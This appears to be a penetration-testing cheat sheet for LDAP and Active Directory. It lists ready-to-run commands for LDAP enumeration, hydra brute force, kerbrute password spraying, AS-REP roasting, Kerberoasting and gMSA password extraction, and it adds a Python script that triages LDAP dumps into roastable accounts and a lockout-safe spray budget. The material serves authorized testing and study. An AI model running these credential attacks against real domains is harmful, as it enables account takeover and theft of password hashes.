# LDAP | 389, 636

* GUI [jxplorer](http://jxplorer.org/)

```bash
## ------------------| Brute Force (hydra module ldap2 = LDAPv2 simple bind; ldap3 for LDAPv3)
## check the lockout threshold first (nxc --pass-pol below), every failed bind counts against it
hydra -l UserName -P Passwordlist $IP ldap2 -V -f
```

## 01. ldapsearch

```bash
#  -x  Simple authentication (anonymous bind when no -D/-w is given)
#  -D  Bind DN or user name
#  -w  Password
#  -b  Search base DN
#  -H  LDAP URI (ldap:// = 389, ldaps:// = 636)

## ------------------| Anonymous bind, no base DN (AD usually answers only the rootDSE this way)
ldapsearch -x -H ldap://$IP

## ------------------| Get LDAP Naming Context (base DN) from the rootDSE
ldapsearch -x -s base namingcontexts -H ldap://$IP

## ------------------| Enum (anonymous first, then with a domain account: -D takes 'DOMAIN\user' or a UPN)
ldapsearch -x -b "DC=<SUBDOMAIN>,DC=<TLD>" -H ldap://$IP
ldapsearch -x -b "DC=<SUBDOMAIN>,DC=<TLD>" -H ldap://$IP -D '<DOMAIN>\<USER>' -w 'PassWord'
ldapsearch -x -b "DC=<SUBDOMAIN>,DC=<TLD>" -H ldap://$IP -D '<DOMAIN>\ldap' -w 'PassWord'

## ------------------| Queries
ldapsearch -x -H ldap://$IP -b "DC=htb,DC=local" '(objectClass=Person)'
ldapsearch -x -H ldap://$IP -b "DC=htb,DC=local" '(objectClass=User)' sAMAccountName | grep sAMAccountName  

## ------------------| Members of Domain Admins (direct members only; nested membership needs memberOf:1.2.840.113556.1.4.1941:=<group DN>)
ldapsearch -x -H ldap://$IP -b "DC=htb,DC=local" -D '<DOMAIN>\<USER>' -w 'PassWord' "(&(objectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=htb,DC=local))" | grep sAMAccountName

## ------------------| Extract users (use a real filter, not "*"; sAMAccountName is the logon name, the CN in the dn often is not)
ldapsearch -x -H ldap://$IP -b "CN=Users,DC=<SUBDOMAIN>,DC=<TLD>" '(objectClass=user)' sAMAccountName | awk '/^sAMAccountName:/ {print $2}'

## ------------------| Other base DNs to swap into -b above (add -s base to read just that object, e.g. a group's member attribute)
-b "CN=Computers,DC=<SUBDOMAIN>,DC=<TLD>"                         ## computers (DCs live in OU=Domain Controllers instead)
-b "CN=<MY NAME>,CN=Users,DC=<SUBDOMAIN>,DC=<TLD>"                 ## self info
-b "CN=Domain Admins,CN=Users,DC=<SUBDOMAIN>,DC=<TLD>"             ## Domain Admins
-b "CN=Domain Users,CN=Users,DC=<SUBDOMAIN>,DC=<TLD>"              ## Domain Users (member is mostly empty: membership is via primaryGroupID=513)
-b "CN=Enterprise Admins,CN=Users,DC=<SUBDOMAIN>,DC=<TLD>"         ## Enterprise Admins
-b "CN=Administrators,CN=Builtin,DC=<SUBDOMAIN>,DC=<TLD>"          ## Administrators
-b "CN=Remote Desktop Users,CN=Builtin,DC=<SUBDOMAIN>,DC=<TLD>"    ## Remote Desktop Users
```

## 02. [WindapSearch](https://github.com/ropnop/windapsearch)

```bash
## Enumerates the domain over LDAP; anonymous bind by default, add -u/-p for an authenticated one
/opt/windapsearch/windapsearch-linux-amd64 -d <domain> --dc $IP -m users --proxy 127.0.0.1:1080
```

## 03. [Kerbrute](https://github.com/ropnop/kerbrute)

```bash
## ------------------| User Enumeration (one AS-REQ per name, no password tried, so nothing gets locked)
kerbrute userenum /usr/share/seclists/Usernames/Names/names.txt -d <domain> --dc $IP
kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -d <domain> --dc $IP

## ------------------| Password Spray (one password per run; each attempt counts against lockoutThreshold, check it first)
kerbrute passwordspray usernames.txt -d <domain> --dc $IP 'password'

## ------------------| AS-REP Roasting (userenum prints a $krb5asrep$ hash for every account with DONT_REQ_PREAUTH; --downgrade asks for RC4 so it cracks faster)
kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --downgrade -d <domain> --dc $IP > hashes.out
```

## 04. NetExec

```bash
## ------------------| Username check over Kerberos (-k): the KDC error tells existing users (PREAUTH_FAILED) from unknown ones (C_PRINCIPAL_UNKNOWN)
nxc ldap $IP -u users.txt -p '' -k

## ------------------| Kerberos rejects clocks more than 5 min off the DC: sync once before any -k / roasting command
sudo timedatectl set-timezone UTC
sudo systemctl stop systemd-timesyncd
sudo ntpdate $IP

## ------------------| AS-REP Roasting (unauthenticated with a user list; with valid creds it pulls DONT_REQ_PREAUTH accounts from LDAP instead)
nxc ldap $IP -u users.txt -p '' --asreproast asreproast.txt

## ------------------| Kerberoasting (authenticated: requests a TGS for every account that has an SPN)
nxc ldap $IP -u 'username' -p 'password' --kerberoasting kerberoasting.txt

## ------------------| List available modules
nxc ldap $IP -u 'username' -p 'password' -L
nxc ldap $IP -u 'username' -p 'password' -M <moduleName> --options

## ------------------| Enumerate password policy (lockoutThreshold / observation window: read this before any spray)
nxc smb $IP --pass-pol
nxc smb $IP --pass-pol -u '' -p ''

## ------------------| Extract Self Information
nxc ldap $IP -u 'username' -p 'password' -M whoami

## ------------------| Extract Group Managed Service Account (gMSA) Passwords (only gMSAs whose msDS-GroupMSAMembership allows your account; the DC returns msDS-ManagedPassword only over an encrypted connection)
nxc ldap $IP -u 'username' -p 'password' --gmsa

## ------------------| Enumerate Users Trusted for Delegation
nxc ldap $IP -u 'username' -p 'password' --trusted-for-delegation

## ------------------| Enumerate Users Without Passwords
nxc ldap $IP -u 'username' -p 'password' --password-not-required

## ------------------| Enumerate Accounts with Admin Count
nxc ldap $IP -u 'username' -p 'password' --admin-count

## ------------------| Enumerate Subnets
nxc ldap $IP -u 'username' -p 'password' -M subnets

## ------------------| Enumerate Domain Trusts
nxc ldap $IP -u 'username' -p 'password' -M enum_trusts

## ------------------| Check LDAP signing and channel binding enforcement (relaying to LDAP/LDAPS only works while they are off)
nxc ldap $IP -u 'username' -p 'password' -M ldap-checker

## ------------------| Run BloodHound
nxc ldap $IP -u 'username' -p 'password' --bloodhound --collection All --dns-server '<DNS_SERVER_IP>'

## ------------------| Enumerate All Users
nxc ldap $IP -u 'username' -p 'password' --users

## ------------------| Enumerate Active Users
nxc ldap $IP -u 'username' -p 'password' --active-users

## ------------------| Enumerate Computers
nxc ldap $IP -u 'username' -p 'password' -M find-computer -o TEXT="SQL"

## ------------------| Enumerate group members (Domain Admins)
nxc ldap $IP -u 'username' -p 'password' -M group-mem -o GROUP='Domain Admins'
nxc ldap $IP -u 'username' -p 'password' -M group-mem -o GROUP='Domain Users'           ## Enumerate Domain Users 
nxc ldap $IP -u 'username' -p 'password' -M group-mem -o GROUP='Administrators'         ## Enumerate Administrators
nxc ldap $IP -u 'username' -p 'password' -M group-mem -o GROUP='Enterprise Admins'      ## Enumerate Enterprise Admins
nxc ldap $IP -u 'username' -p 'password' -M group-mem -o GROUP='Remote Desktop Users'   ## Enumerate Remote Desktop Users

## ------------------| Enumerate Group Memberships
nxc ldap $IP -u 'username' -p 'password' -M groupmembership -o USER='<TARGET_USER>'
```
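Every flag in the block above (`--asreproast`, `--kerberoasting`, `--password-not-required`, `--trusted-for-delegation`, `--admin-count`, `--pass-pol`) and the `ldapsearch` filters in section 01 come down to reading a handful of attributes: `userAccountControl` bits, `servicePrincipalName`, `adminCount`, `memberOf`, and the domain object's lockout settings. The script below is an added example, not code from this cheat sheet, NetExec or OpenLDAP: it parses LDIF in the shape `ldapsearch -LLL` prints (a constructed sample is embedded, with made-up accounts, SPNs and policy values under the page's `DC=htb,DC=local`), sorts enabled accounts into the same buckets the nxc flags report, and turns the lockout policy into a per-window spray budget. The bucket names, the `margin` of two attempts and the skipping of machine accounts (`$`) are this example's own choices.

```python
import base64

# userAccountControl bits (MS-ADTS) behind the nxc flags above
UAC_ACCOUNTDISABLE = 0x0002
UAC_PASSWD_NOTREQD = 0x0020
UAC_TRUSTED_FOR_DELEGATION = 0x80000   # unconstrained delegation
UAC_DONT_REQUIRE_PREAUTH = 0x400000    # AS-REP roastable

# Constructed sample in the shape ldapsearch -LLL prints; accounts, SPNs and policy values are made up.
SAMPLE_LDIF = """\
dn: DC=htb,DC=local
lockoutThreshold: 5
lockOutObservationWindow: -18000000000

dn: CN=Administrator,CN=Users,DC=htb,DC=local
sAMAccountName: Administrator
userAccountControl: 66048
adminCount: 1
memberOf: CN=Domain Admins,CN=Users,DC=htb,DC=lo
 cal

dn: CN=krbtgt,CN=Users,DC=htb,DC=local
sAMAccountName: krbtgt
userAccountControl: 514
servicePrincipalName: kadmin/changepw

dn: CN=svc_backup,CN=Users,DC=htb,DC=local
sAMAccountName: svc_backup
userAccountControl: 4260352
description:: U2VydmljZSBhY2NvdW50

dn: CN=sqlsvc,CN=Users,DC=htb,DC=local
sAMAccountName: sqlsvc
userAccountControl: 66048
servicePrincipalName: MSSQLSvc/sql01.htb.local:1433

dn: CN=kiosk,CN=Users,DC=htb,DC=local
sAMAccountName: kiosk
userAccountControl: 544

dn: CN=DC01,OU=Domain Controllers,DC=htb,DC=local
sAMAccountName: DC01$
userAccountControl: 532480
servicePrincipalName: HOST/dc01.htb.local
"""

def parse_ldif(text):
    """LDIF -> list of {attr: [values]}; unfolds continuation lines and decodes `attr::` base64 values."""
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:
            unfolded[-1] += raw[1:]       # a leading space continues the previous attribute line
        else:
            unfolded.append(raw)
    entries, cur = [], {}
    for line in unfolded:
        if not line.strip():
            if cur:
                entries.append(cur)
                cur = {}
        elif not line.startswith("#"):
            attr, _, rest = line.partition(":")
            if rest.startswith(":"):      # "attr:: <base64>": non-ASCII or leading/trailing spaces
                value = base64.b64decode(rest[1:].strip()).decode("utf-8", "replace")
            else:
                value = rest.strip()
            cur.setdefault(attr, []).append(value)
    return entries + [cur] if cur else entries

def triage(entries, domain_admins_dn="CN=Domain Admins,CN=Users,DC=htb,DC=local"):
    """Bucket enabled accounts the way the nxc flags above report them."""
    found = {k: [] for k in ("asreproast", "kerberoast", "password_not_required",
                             "trusted_for_delegation", "admin_count", "domain_admins")}
    for e in entries:
        sam = e.get("sAMAccountName", [None])[0]
        uac = int(e.get("userAccountControl", ["0"])[0])
        if sam is None or uac & UAC_ACCOUNTDISABLE:
            continue                      # not an account, or disabled (krbtgt lands here)
        if uac & UAC_DONT_REQUIRE_PREAUTH:
            found["asreproast"].append(sam)
        if e.get("servicePrincipalName") and not sam.endswith("$"):
            found["kerberoast"].append(sam)   # machine accounts have random 120-char passwords: skip
        if uac & UAC_PASSWD_NOTREQD:
            found["password_not_required"].append(sam)
        if uac & UAC_TRUSTED_FOR_DELEGATION:
            found["trusted_for_delegation"].append(sam)   # DCs are expected here; anything else is a finding
        if e.get("adminCount", ["0"])[0] == "1":
            found["admin_count"].append(sam)
        if domain_admins_dn.lower() in (m.lower() for m in e.get("memberOf", [])):
            found["domain_admins"].append(sam)    # direct members only, like the memberOf= filter in section 01
    return found

def spray_budget(entries, margin=2):
    """Lockout policy from the domain object -> safe guesses per user per window (None = no lockout)."""
    domain = next(e for e in entries if "lockoutThreshold" in e)
    threshold = int(domain["lockoutThreshold"][0])
    # AD stores the window as a negative count of 100 ns intervals
    window_min = abs(int(domain["lockOutObservationWindow"][0])) // 10_000_000 // 60
    safe = None if threshold == 0 else max(threshold - margin, 0)
    return {"threshold": threshold, "window_minutes": window_min, "safe_attempts_per_window": safe}

if __name__ == "__main__":
    entries = parse_ldif(SAMPLE_LDIF)
    print(triage(entries), spray_budget(entries))
```

To run it against a real dump, replace `SAMPLE_LDIF` with the output of the section 01 commands (request `sAMAccountName userAccountControl servicePrincipalName memberOf adminCount lockoutThreshold lockOutObservationWindow`). Without `-LLL` the trailing `search:`/`result:` lines become a pseudo-entry with no `sAMAccountName`, which `triage` ignores. The two things a `grep | awk` pipeline silently gets wrong, folded lines and `::` base64 values, are exactly what the Administrator and svc_backup entries exercise.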

## 05. LDAPDomainDump

```bash
## ------------------| Only JSON output
ldapdomaindump --no-grep --no-html -o ldapinfo $IP -u '<domain>\<username>' -p '<password>'

## ------------------| Only HTML output
ldapdomaindump --no-json --no-grep -o ldapinfo $IP -u '<domain>\<username>' -p '<password>'
```

